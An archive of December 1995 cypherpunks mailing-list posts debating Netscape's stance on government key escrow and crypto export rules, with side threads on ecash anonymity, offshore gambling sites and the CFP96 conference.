> upon secrecy, obscurity, and above all terrorizing individuals; the gov't
> would be extremely reluctant to throw the book Netscape, given its
> symbolic significance in the market. And even if it did, Clark's future
> would be assured--maybe after he got out of Club Fed, but assured
> nonetheless.

Clark's future is already assured.  So what if the bubble pops?  If
Netscape lost 90% of its value it would still be valuable.  The only time
$500 million doesn't look like an awful lot of money is when you compare
it to $5 billion. 

You're not seriously expecting Clark to expose himself to the risk of 
jail time, are you?

>       Let me be clear: if Clark and Netscape said "We're implementing and
> releasing a version with a key length we support," crypto policy would be
> the lead story on the evening news--and the gov't would lose. The only
> question is how fast. 

I agree with you that the government will lose a public debate about GAK 
and crypto export.  I just don't believe that defying the law is the way 
to go, more more accurately, that there's a snowball's chance in hell 
that Netscape would do it.

If you want to talk about what would pop the bubble the quickest, running 
around like a loose cannon and defying the law would have to be right up 
there.

> >The decison that Netscpae is faced with now is a big one.  It's going to 
> >have widespread and long lasting consequences for privacy and civil 
> >liberties all over the world.  When you look at what's going to happen on 

[...]

>       You set forth all these silly generalities as though they suggest
> that NS's best bet--for Clark, for itself, for the public--is to go along
> with US policy? Bullshit. Their best bet is to use their golden-boy status
> to sucker punch the gov't.

Your criticism of what I wrote is valid, to a certain extent.  I was
making general and simplistic arguments.  Sometimes they're the best
arguments.  Read the Contract with America or watch some of the "Why We
Fight" movies. 

And I'm not laying any claims to saying anything new here.  I'm not 
contributing anything in the way of analysis.  On the contrary, all I'm 
doing is pointing out the obvious.

There are two degrees of victory here.  The first is to have access to
strong crypto, legal or not.  That's already won.  If you've got a copy of
Applied Cryptography, you can pretty much do whatever you want.  There's a
lot of code out there, good tools exist and are easily aquired.  Sameer
has an apache ssl server that you can use instead of Netscape's commerce
server, and there are modified Mosaics that will talk to it. 

The battle we're fighting now is for legal access to strong crypto, and an
understanding on the part of the government that software engineers ought
to be able to build strong and secure international systems without
harassment.

You want some more platitudes?  The export restrictions on crypto are bad 
for business and they're not going to prevent the bad guys from 
communicating securely.  The genie is out of the bottle.

Crypto is rapidly becoming a tool that's essential to the operation of
even the most mundane business.  It's simply unrealistic to treat crypto
as a munition in a day and age when (a) everyone knows how it works, (b)
there are many thousands of people all over the world who have the ability
to write good crypto code, and (c) you have to use crypto to conduct your
business. 

The ITAR, as it relates to crypto, is hurting America's ability to compete
in international markets.  As more commerce moves online the damage
inflcted by ITAR will intensify drastically.  If Netscape takes that
argument to the business community, they'll be supported, because it's
reasnable and because it's the truth.

This isn't just about Netscape.  It's going to affect Sun, AT&T,
Microsoft, Oracle, and countless smaller companies.  It's going to affect 
the ability of GM to communicate internationally without falling victim 
to corporate espionage.

We're not selling snake oil here.  The cypherpunk position on crypto is
good for companies like Netscape, it's good for the economy gererally, and
it's good for the political health and general well being of the republic.

> >        1       Netscape will follow all laws and regulations.
> >        2       The current rules are forcing Netscape to choose
> >                between providing reasonable levels of privacy
> >                to its customers and competing in the international
> >                marketplace.
> >        3       Netscape feels the rules should be changed to make
> >                this choice unnecessary.

I still believe this is the winning argument, and that both the public's 
and Netscape's interest will be served if they make it publicly and 
forcefully.

>       1     Make illegal software available by FTP
>       2     Explain it's doing so because ITAR is bullshit
>       3     Face the gov't down in the press and in the courts 

Go for it.  We're behind you 100%.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sun, 3 Dec 95 13:07:29 PST
To: sameer@c2.org (sameer)
Subject: Re: prototype slot-machine
In-Reply-To: <199512031751.JAA01922@infinity.c2.org>
Message-ID: <199512031957.OAA00168@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> > Try this site: Offshore Infomation Services in Anguilla,
> > http://www.offshore.com.ai/
> 
> Hey, fancy that, even though gambling is illegal in California you're
> saying that on a site two feet from my desk it's legal?
> 
> 	cool.

Its legal until someone makes some money at it. Soon as someone makes
enough to notice, then you can bet that the FBI/IRS/Dept. of
Agriculture (responsible for weights and measures in many locals) and
the local lottery commission are all going to come and take a piece of
the action.

Having a gamebling establishment is something that, in America, is
reserved as a privleadge solely for the capitalist elite. If you don't
have a big-ass bankroll and a rolodez full of connections to begin
with, you can expect to find your ass in jail and your posessions on
the auction block just as soon as someone takes notice of you.

But thanks to the InterNet, thats all changed. =)

I for one would be happy to pay all applicatable income taxes to any
government that would allow me to host gambeling via the net and
promise not to throw me in jail for making too much money too fast or
not following some outdated work ethic. Of course, you still run the
risk that you might wake up one night to find yourself sourrounded by
Navy seals and assult copters, or that congress will mandate a
national firewall on your site or something equally extream, but not
unless you are really living the good life.

=)

Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sun, 3 Dec 95 13:12:11 PST
To: master@internexus.net (Laszlo Vecsey)
Subject: Re: your mail
In-Reply-To: <Pine.LNX.3.91.951203113858.13147C-100000@micro.internexus.net>
Message-ID: <199512031959.OAA00178@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


My mail??

Who is the wise guy who keeps putting "Your mail" in the topic?

Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rmarquis@umich.edu (Robert Marquis, Jr.)
Date: Sun, 3 Dec 95 12:02:58 PST
To: cypherpunks@toad.com
Subject: Questions
Message-ID: <v01530502ace7ad85c8de@[198.109.36.28]>
MIME-Version: 1.0
Content-Type: text/plain


Hello.

I was wondering if anyone would be able to help me out.  I am writing a
research paper and I need some interviews for it.  If you could answer any
of these questions about security, I would greatly appreciate it.  Thanks
for your time.

--Bob Marquis

Please send responses to rmarquis@umich.edu


- How can PGP help secure something like e-mail?

- Are there any encryption schemes which are "unbreakable"?

- What would someone need to do to send an e-mail message which cannot be
read or altered by anyone else, or is it not possible?

____________________________________________
 Robert Marquis, Jr.
 University of Michigan - Dearborn

 e-mail: rmarquis@umich.edu
    www: http://www.umd.umich.edu/~rmarquis






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sun, 3 Dec 95 13:10:56 PST
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Suggestion for CP browser
In-Reply-To: <9512031205.AA24992@all.net>
Message-ID: <199512032003.PAA00189@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> I think a CP browser is just the ticket to change the way the world works.
> How about this:
> 
> 	- CP writes a browser with PGP or better quality crypto.
> 	- CP makes it freely available to any individual
> 	- CP licenses it to corporations for $1 per copy
> 	- Funds produced go to support worthy causes, support a permanent
> 		home for CP, and support anti GAK efforts (lobying, etc.)
> 
> I think the CP browser should include an embedded language (not Java -
> maybe a version of LISP) that does a far better job than Java of assuring
> limitations on what programs can do.  It should also support faking the
> source of a browser request (for privacy of the user), all forms of digital
> cash, firewall-type forwarding, pseudonyms, and all of the other things that
> CPs fight for.

I was just about to say something rude to whoever wrote this one, then
I noticed who it was.

Where is a clue hammer when you need one?

Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Abelson <hal@martigny.ai.mit.edu>
Date: Sun, 3 Dec 95 12:34:26 PST
To: cypherpunks@toad.com
Subject: Sixth Conference on Computers, Freedom, and Privacy
Message-ID: <9512032034.AA10139@toad.com>
MIME-Version: 1.0
Content-Type: text/plain




		      Please redistribute widely

	       ****************************************


The Sixth Conference on Computers, Freedom, and Privacy will take
place at the Massachusetts Institute of Technology on March 27-30,
1996.  CFP96 is hosted by MIT and by the World Wide Web Consortium.

Since its inception in 1991, the series of CFP conferences has brought
together experts and advocates from the fields of computer science,
law, business, public policy, law enforcement, government, and many
other areas to explore how computer and telecommunications
technologies are affecting freedom and privacy.

Registration for CFP96 will open on December 8.  

Conference attendance will be limited.  Due to the enormous public
interest in CFP issues over the past year, we encourage you to
register early.

SPECIAL NOTE TO STUDENTS: There are a limited number of places
available at a special student rate.  These will be allotted on a
first-come first-served basis, so register as soon as possible.

Events planned for this year's conference include:

    - Federal prosecutors square off against civil-liberties lawyers
      in a Supreme Court test of the "Cryptography Control Act of
      1996", which criminalizes non-escrowed encryption.
      
    - Authors Pat Cadigan, Tom Maddox, Bruce Sterling,
      and Vernor Vinge divine the future of privacy.

    - College administrators, students, lawyers, and journalists
      role-play scenarios that plumb the limits of on-line expression
      on campus networks.

    - Panels on international issues in privacy and encryption; on the
      struggle to control controversial content on the Internet; on
      tensions between copyright of digital information and freedom of
      expression; on threats posed by electronic money to law
      enforcement, privacy, and freedom; on mass communication versus
      mass media.

You can register for CFP96, starting December 8, by US Mail, by fax,
or via the World Wide Web.

For more information, see the CFP96 Web page at


		       http://web.mit.edu/cfp96


or send a blank email message to 

			  cfp96-info@mit.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 3 Dec 95 13:11:16 PST
To: Dave Del Torto <ddt@lsd.com>
Subject: Re: EXO_ner
In-Reply-To: <v03003e00ace6c5d1f9c1@[129.46.82.85]>
Message-ID: <Pine.SUN.3.91.951203161108.6588B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Dave Del Torto wrote:

> At 9:34 AM 12/2/95, John Young wrote:
> 
> >SenXon and The Washrag blow today about which has the most to
> >be ashamed of and hide from the filthy lingerie leering
> >republic.
> 
> Exon, Exoff, XON, X-off, Exxon, ex-off.

Wax on, wax off.

> 
>    dave
> 
> ____________________________________________________________________
> "Packwood's supporters were left groping for answers." --news anchor
> 
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Dec 95 14:58:03 PST
To: cypherpunks@toad.com
Subject: RE: Do the Right Thing
Message-ID: <ace76787260210043e19@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:09 PM 12/3/95, Pat Farrell wrote:
>I personally believe that this topic does not deserve the heat that it
>has generated on this list. This opinion could change. I'll have a much
>better idea Tuesday evening when I've had a chance to hear the latest from
>NIST on GAK for export.

Well, people discuss what they think is important. Those who don't think
this topic is important are of course not compelled to participate in the
debate.

>I think we need to save out fury for real statements about making
>non-GAK illegal for domestic use. If this starts to condense out
...
>I have no problem with Netscape having a GAK-ified browser in addition
>to a real one. At least as long as the GAK'd version is clearly identified
>-- a logo saying "big brother inside" covering 25% of the screen should
>do it for me.

These two points are what many of us are concerned about. Some may argue
"Wait until it's illegal, then protest," but I think the Cypherpunks list
has shown a particular strength in spotting "early warning signals" well in
advance of actual developments, thus enabling us to get our ducks in line
and hit the ground running (to mix some metaphors).

Is it too early to worry about outlawing of non-GAKked crypto? Hal Abelson
has this in the preliminary program for CFP '96, sent out today:

"Events planned for this year's conference include:

    - Federal prosecutors square off against civil-liberties lawyers
      in a Supreme Court test of the "Cryptography Control Act of
      1996", which criminalizes non-escrowed encryption."

...
>It was quite clearly implied at the September meetings that the
>Government expected that vendors would do only one version, GAK'd.
>This would allow the LEAs to tromple all over US civil liberties
>at will.

This was my point about having a domestic and an export version. (You
mentioned that Netscape already does this, and in fact probably has 10 or
more versions, for various platforms. Fine. Many of us want to keep it that
way, especially with regard to GAK. Saying that Netscape wants "a single
version with crypto suitable for all" is not OK if that version includes
GAK. This is what I am urging Netscape to take a stance on, now, soon,
quickly.)


>Tim's suggestion of a formal statement that separates domestic product
>from export, and clearly leaves GAK out of US products, is a very good one.
>It is close to what Netscape is doing now, it is completely consistant
>with current and publically announced policies, and it would
>let this list return to discussions that are relevant to
                                              ^^^^^^^^^^^
>cryptography.
 ^^^^^^^^^^^^

Pat, if the policies and technologies surrounding key escrow are not
relevant to the themes of the Cypherpunks list, I surely don't know what
is!

That so many people are commenting on this topic, and not, say, on a more
"relevant" topic such as "Fermat factorization and the rho method in
elliptic curve cryptosystems" tells us what the apparent focus of the list
is. (Fact is, there are only a handful of folks on the list--and perhaps in
the world only a few hundred--who have strong competency in these
areas....asking that the list confine itself itself to discussions
"relevant to cryptography" is pointless. Technical cryptography is probably
better handled in sci.crypt or sci.crypt.research, or at conferences. And
"How to Use PGP" questions are better handled in many other places. Just my
opinion. Others are of course welcome to discuss how to use PGP or the
intricacies of quadratic reciprocity, just as I will feel welcome to
discuss key escrow in its various forms and implications.

People talk about what matters to them, for the most part, and attempts to
"steer" the list to other topics are best done by example. That is, write
up a really interesting article on some "relevant" topic and perhaps people
will discuss it. That seems better than saying a discussion of GAK is not
relevant.

And the NIST/NSA meeting is coming up in a few days...what better time to
discuss some issues, and thus possibly trigger some ideas or arguments for
attendees to make, than now? What's the point of waiting until it's over,
when all we can do then is complain?

I think key escrow, whether of the Clipper variety of the SKE variety, is
central to the themes of the group.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 3 Dec 95 13:22:35 PST
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Questions/Comments on ecash protocol
In-Reply-To: <v02120d05ace6ea8784af@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.951203161754.5019E-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995, Lucky Green wrote:

[..cuts...]

> At 22:40 12/2/95, Michael Froomkin wrote:
> 
> >3) Is there a way [how hard is it] for charlie to extract a coin and
> >either
> >   (i) copy it and/or
> >
> >   (ii) send it to David [3rd party] in such a way
> >that David could insert it into David's MTB software and then spend it to
> >Sam without Sam or the Bank noticing that anything was wrong.  If Charlie
> >and David do this, David now has a coin that is from his point of view
> >both payee and payor anonymous, although Charlie has a risk that David
> >will double-spend and expose Charlie to the bank's wrath.
> 
> I can't help the feeling that I am missing something whenever you bring up
> this question. Assuming it could be done. What would David gain? He as the
> payor is anonymous to Sam either way. Sam still would have to be worried
> about being identified, since if Charlie gives David access to Charlie's
> wallet, it is safe to assume that Charlie will give David (and the mint)
> access to his blinding factor. Which in turn would reveal Sam as the payee.
> 
> The protocol you suggest gives the parties exactly what they would have if
> they just used Ecash "out of the box": full payor anonymity, no payee
> anonymity. So why bother?
> 
These scenarios only matter if the blinded coins have payer info coded 
into them.  With zero payer info you are correct they are irrelevant.  I 
was operating under the (incorrect, it seems) assumption that the blinded 
coins followed what I now understand to be the OFF-LINE ONLY version of 
the protocol.  In that version, where the blinded coin issued to Alice 
has info about her coded on to it and/or there is information about payee 
encoded onto the coin, then such exchanges are necessary to create payee 
anonymity.

Even with the current protocol, you can achieve payee anonymity if you 
send a coin to a coin clearinghouse that deposits for you.  Alice gives 
Bob a coin for value.  Bob turns the coin over to Carol who, for a small 
fee, deposits the coin.  Now bank knows carol deposited the coin, but 
knows of neither Bob nor Alice.   Indeed Bob need have no account at the 
bank at all.  I recognize that there are issues here, esp. for Bob -- 
does he wait on line while Carol clears the coin before telling Alice 
that payment cleared (delays?).  Or does he bear the risk?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rthomas@pamd.cig.mot.com (Robert Owen Thomas)
Date: Sun, 3 Dec 95 14:30:09 PST
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Globally legal Netscape
In-Reply-To: <9512032146.AA07279@all.net>
Message-ID: <9512031626.ZM17818@pamd.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


look, this is just a *bit* extreme.  having been one of those folks sworn
to uphold the Constitution, i can tell all of you that there is no master
plan to rid the American people of their rights and freedom.

this is not to say we should not keep a sharp and keen eye open for any
assault upon our liberties.  rather, having "BEEN THERE", i just do not
see any threat along the lines of, er, Hitler, Stalin, Mussolini, et. al.

let's try to keep this in perspective, Fred.  perhaps a little less
caffiene would help?  ;-)

regards,
--robert,
a former U.S. government employee...but i won't say where...;-)
--

o  Robert Owen Thomas:  Corvette pilot. Cymro ydw i. User scratching post.  o
o       E-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@Cymru.COM        o
o               Vox:  708.435.7076   Fax:  708.435.7360                     o
o        "When I die, I want to go sleeping like my grandfather...          o
o              Not screaming like the passengers in his car."               o




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 3 Dec 95 13:41:18 PST
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: Talking to Jim
In-Reply-To: <199512031730.SAA06145@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951203161502.6588D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995, Anonymous wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Jim Clark was quoted as having written:
> 
> > I made some pragmatic comments.
> 
> > I said that if we are to use this encryption technology in 
> > business, we must have a better solution than to limit 
> > keylength or put keys in escrow. All governments of the world 
> > have a valid concern about terrorism and other activities of 
> > concern to the security of their nations. 
> 
> So what?  If their position were (as it has long been in some countries)
> that their "concern" is best addressed by wholesale eavesdropping and  
>  informant networks, would you cave to that, too? This is an absurd 
>  foundation.

Worked great in France, right?  No terrorist problems there or anything.

> > All of them will continue to restrict our ability to provide 
> > products to their markets unless we build in some mechanism 
> > that allows them to legally access information that is in the 
> > interest of their national security. 
> 
> Whoa!  You're giving away the store without a fight!  You've been able to
> capture what, 60-70% of the browser activity "market" and get a huge 
> amount of capitalization from the public market, and you're whining that 
> the world's going to end if government "restrictions" continue, just 
> because those restrictions might slow down your commercial world 
> conquest? Give me a break!

Mr. or Ms. Anonymous here has hit on the nose what irritates me about 
Netscape's attitude.  For them opposing GAK is not voluntarily installing 
it into their software, sending a lackey (who may or may not know squat 
about how to schmooze washington and beltway fever types) to babble at a 
conference, and generally snowjobbing the educated portions of the 
marketplace by claiming to be on their side in opposition to GAK.

I am reminded of a certain dictator of a certain canaled nation who's 
anti-drug rhetoric was the strongest voice in Central and South America 
for a time.

> LET THEM CONTINUE to restrict! That will take care of itself quite 
> handily. You're just afraid you'd miss some opportunities, or be one of 
> the commercial casualties, isn't that right? Isn't that what this is 
> really all about?

I think it's more about laziness actually.  Netscape would (should) see 
quite quickly that key escrow is going to hurt them in the foreign 
market, and to some extent in the United States.  One would expect them 
to discover this and be screaming bloody murder.

As I have said before, as I will repeat, I'm sure the list is tired of my 
babbling, Netscape has a voice.  If Netscape were to scream and yell that 
GAK is unacceptable, people would take notice.  What does Netscape have 
to lose exactly?  If they still make GAK the law of the land, Netscape 
is, of course, probably going to comply.

_What does that have to do with trying to prevent it from ever being made 
the law of the land?_

I am saddened that the company which has so much power today to further 
the technology, the freedom and velocity of information, and privacy, is 
such a bowl of pudding.

> And a valid concern, too, but not at the expense of my 
> freedom! It seems clear from the way you put this that world 
> standardization at ANY level of security would satisfy your commercial 
> objectives.

Which is a silly objective considering the inviability of a NSA designed 
escrow system in any foreign market.

> > (We obviously cannot be involved in determining what is legal 
> > by the laws of that country.) 

Determining the falsehood of this statement is left as an exercise for the 
reader.

> 
> > This is not just a US government problem. Until recently, 
> > France did not even allow us to sell products with 40-bit 
> > keys, much less 128-bit keys. 
> 
> And some of us think that such idiocy, like celibacy, is a 
> self-correcting phenomenon in this information age.

Why any company would model their efforts after the French government is 
a complete mystery to me.

> > A lot of ordinary citizens are rightly concerned about their 
> > own privacy. 

Here comes the snow job.

> 
> > I am one of them. 

It's going to be a white christmas honey.
> 
> > I do not want the government to snoop on me, 
> 

Did you buy road salt?

> > but in fact the government, through the FBI, can now tap my 
> > phone without my knowing it by simply getting sufficient 
> > evidence that I am conducting illegal activities, then 
> > presenting this evidence to a court to get permission. I have 
> > no say in the matter.

Gee, let's make sure they can do it for Netscape too!

> > If we as a company were to take the position that in no case 
> > will we allow a government to get access to our encrypted 
> > messages, or refuse to allow key escrow with our products, 
> > the governments of the world will quickly put us out of 
> > business by outlawing the sale of our products in their 
> > countries. 

Wow.  Where did you learn your economics?

In the alternative, where did you learn your propaganda skills?
This sounds like School of the America's Stuff.

> I believe you have underestimated the power of a leading-edge 
> 21st-century information product that is "Not available where 
> regulated." I think you're copping out and looking for the easier, "Now 
> with the best encryption available! (because no one is allowed to offer 
> better)"

In fact, if Netscape really wanted to do well, they should be promoting 
their product, which I might add has a strong showing in the 18-24/5 
bracket- precisely that bracket likely to fret over government involvement,
as "Crypto so strong, it is banned in (x) countries!"

> > The fundamental issue is how do we accommodate the 
> > requirements of governments, while protecting our 
> > rights as citizens.

WOAH!  Now I'm REALLY pleased I sold my stock.

They bloody well SOUND like the NSA.

> > None of this represents the position of Netscape with 
> > respect to what we will do. 

Perhaps, perhaps not.  It sure seems to represent the attitude we can 
expect even from the 'pro crypto' types in Netscape.  If this is the 
limit of your potential....

> > But if we do not come up with a solution to this problem 
> > that is acceptable to each government, 
> 
> There it is:  Supine, prostrate, submissive.

Jim, and Netscape in general, simply has no idea what-so-ever what kind 
of sword they are carrying.  Someone needs to give them a shot of 
something.

> 
> > In fact, we could even be ordered by our own government to 
> > establish a key escrow system for its use inside the US.
> 

The way you are going, you will.  Why, as you sound so upset about this, 
aren't you DOING something?  Why aren't you out behind a podium pounding 
your shoe with:

"We will not accept GAK, it is wrong, we will bury you."

The time for submission and kissupping, for which there will be MUCH 
time, as AFTER GAK is mandatory.  (Some might argue that this is the time 
for work to have it repealed, but they don't know much about institutions 
in the U.S.)

> 
> > Ironically, anyone in the US may import unbreakable 
> > encryption technology from another country -- we just 
> > cannot sell it back to them. No one ever accused the 
> > government of being rational.
> 




> This is the clearest thing you've written in the whole piece

He is confused.  He knows the issue, he just doesn't know what to do.  
Like a child with a firearm.

> > I chair an industry group called the "Global Internet 
> > Project", with members from almost twenty companies, 
> > including companies from Asia and Europe. This was the 
> > central issue we all agreed upon this morning, and we 
> > are putting together a policy statement whose purpose 
> > is to educate lawmakers on the importance of quick 
> > resolution of this matter.

Wow.  You have done more damage than you know.

A quick resolution is going to be in your detrement.

"Diamond, oh Diamond, you know not the mischief done."

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sun, 3 Dec 95 13:49:24 PST
To: cypherpunks@toad.com
Subject: Globally legal Netscape
Message-ID: <9512032146.AA07279@all.net>
MIME-Version: 1.0
Content-Type: text


If Netscape wants a global product that is completely legal anywhere,
all they have to do is eliminate all encryption.  The deal they are
cutting now is to claim that they provied privacy when they do not. 

The saddest part is that many people will believe they are secure:
-> the credit card companies and ecash banks will charge interest
   on every transaction to pay for the fraud rates,
-> the government will close its grip even tighter on individual
   freedom and get an even tighter stranglehold on free speech,
-> politicians and right wing demogogues will begin to expose
   individuals for having abortions and reading smut and thinking
   the "wrong" way.

I'm not asking you to believe this - only to look at history and see the
parallels throughout time.

	- The Russian revolution resulted in purges killing hundreds of
	thousands of innocent people because of their private, turned
	public, views as expoused in their private writings.

	- The Soviet government took away personal privacy to keep their
	stranglehold on their people.

	- The Chinese government used cameras and other similar
	privacy-removing techniques to track down the peaceful
	protesters who stood for free speech in Tien-a-men square. 

	- The Germans under Hitler used personal records to identify and
	murder millions of Jews and other peoples.

These are just four examples of selected from this century! There are
many more in each century.

Personal privacy - freedom from unreasonable search and seizure - the
right to bear arms - all of these tell me that the US constitution
secures the ability of Americans to have secure personal encryption in
the information age.

The president of the United States, each member of congress, and each
CIA and NSA and FBI agent swears to God that they will protect and
defend these rights as a condition of taking their offices.  Those that
fail to support the constitution in this way should be tried as traitors.

But instead, we see these people coercing Netscape into breaking the law
on their behalf. Breaking the law by cooperating with the government in
illegal search and seizure, breaking the law in preventing Americans from
attaining privacy, and breaking the law by defrauding the public with false
claims of privacy protection.

This is the time for Netscape to prove itself to the public by taking a
stand for the Constitution, for the law of the land, and for the people
of the United Stated and the world.

If Jeff the Netscape munitions expert sees this, I hope he forwards it
to his boss, and I hope his boss considers seriously that he may be the
instrument of a totalitarian state arising in the US and throughout the
world.

It's easy to say that you're not responsible and that it's the
government's fault, and that you're just following orders.  But there is
an old saying - evil flourishes when good people do nothing.

If money is what you worship, you can get it by standing on the dead
bones of your fellow human beings.  Hitler did it, it was done in the
Russian revolution, it was done in the Soviet Union, it was done in
China, and it will be done again and again, as long as the Netscapes of
the world fail to make a stand when it counts.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Sun, 3 Dec 95 14:09:25 PST
To: cypherpunks@toad.com
Subject: RE: Do the Right Thing
Message-ID: <61765.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I personally believe that this topic does not deserve the heat that it
has generated on this list. This opinion could change. I'll have a much
better idea Tuesday evening when I've had a chance to hear the latest from
NIST on GAK for export.

Much of the complaining in September was that vendors didn't want
to build two versions, one domestic and one for "export"
Netscape is currently doing at least two, and probably closer to
ten if you count Windows 16, 32, Mac, Motif, etc.

  tcmay@got.net (Timothy C. May)  writes:
> Netscape, being the dominant browser company, and Microsoft, being the
> dominant OS company, are in special positions to "build in Big Brother."
> I'm not claiming they are, just that they are clearly in a position to
> make it technologically more feasible to make non-GAK illegal. They both
> need to carefully think about the role that's been "given" to them
> (whether by fortune, hard work, or being in the right place at the right
> time) and do what's right.

Except for Louis Freeh and Dorrthy Denning, I haven't heard real people
support GAK domestically, although Geoff Grevildinger's pitch at the Sept
NIST meeting was 99 & 44/100% domestic. I'll be listening pretty
carefully this Tuesday.

I think we need to save out fury for real statements about making
non-GAK illegal for domestic use. If this starts to condense out
of the Ether, I expect that the civil liberties lobbies will
get real loud. the ACLU and VTW were both vocal at the September
meeting, and EPIC was there, along with folks like Proffessor Hoffman of
GW.


> And what Netscape agrees to put in future releases of its browsers or its
> servers could have dramatic effects on the whole climate.

I have no problem with Netscape having a GAK-ified browser in addition
to a real one. At least as long as the GAK'd version is clearly identified
-- a logo saying "big brother inside" covering 25% of the screen should
do it for me.


> And if export laws demand GAK in exported products, Netscape should "do
> the right thing" and have two versions. It may add to their costs a
> little, but it's better than building in the machinery for a GAK law to
> later be passed.

Netscape is currently doing two (or ten) version. This simple
fact seems to have been lost by most of the posters in the
past few days.

If the issue is just that people don't like the idea that the free,
downloadable is GAK'd and that they have to pay $50 for a browser
with strong crypto, please take your whining off list. Or find
one you like (Netmanage's is too buggy for me, but Mosaic version 2 is
quite usable, as is Microsoft's, IMHO)

> (Explain something to me. I have never, ever understood why it is a
> concern of the U.S. government that we help build in GAK for foreign
> governments, that we make sure that products intended for export to
> France or Syria have GAK that allows those governments to read the
> traffic of their citizens. And if the concern is that exported versions
> of software must be readable to the _United States_, then this is a
> non-starter in terms of sales in many or even most foreign countries! I'm
> sure France will welcome with open arms a version of Netscape that allows
> the NSA to read the traffic of French citizens. Oh, by the way, what
> legal jurisdictions will be involved in obtaining the escrowed keys of
> foreigners? The answers are both clear and murky, if you catch my drift.)

The "criteria" (see my http://www.isse.gmu.edu/~pfarrell/nistmeeting.html
page) clearly say that approved systems can _not_ interoperate
with unapproved systems. This means that exportable systems can not
interoperate with, say, PGP.

There was talk about having multinational treaties so the French, Iranian,
and other "friends" could access the GAK's messages, but that was
recognized as being many years out. Diplomacy is slow.

It was quite clear from multinational vendors that they thought
that non-US corporations would _absolutely not_ accept
GAK in the US.

The main effect of this stupid export stuff is to drive
crypto development offshore.

> If the U.S. insists on GAK _within the U.S._, as many of us fear is the
> long-term danger, then all bets are off anyway. But I would hope that
> Netscape does nothing to make it _easier_ to make this the case!

It was quite clearly implied at the September meetings that the
Government expected that vendors would do only one version, GAK'd.
This would allow the LEAs to tromple all over US civil liberties
at will.


> A viable thing for Netscape to do is to announce forthrightly that it will
> separate the issue of export from what it sells in the U.S., that there
> will be NO GAK included in any U.S.-sold packages. The quest for an "all
> world" version, freely exportable, should not take precedence over the
> civil liberties issues. And I predict that any slight losses in market
> share or slight increases in product cost will be _less_ than the effects
> Netscape will see if their product comes to be associated with "Big
> Brother Inside."

I've been developing software too long to accept that the increases
in product support costs will be "slight". But I agree that
Netscape should _continue_ to have three separate versions, one for
domestic use, a second one for export from the US, and the third  with
Fortessa for sale to Govie agancies that want it.  They probably need to
add a fourth version, a strong foreign version developed offshore.

Tim's suggestion of a formal statement that separates domestic product
from export, and clearly leaves GAK out of US products, is a very good one.
It is close to what Netscape is doing now, it is completely consistant
with current and publically announced policies, and it would
let this list return to discussions that are relevant to
cryptography.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
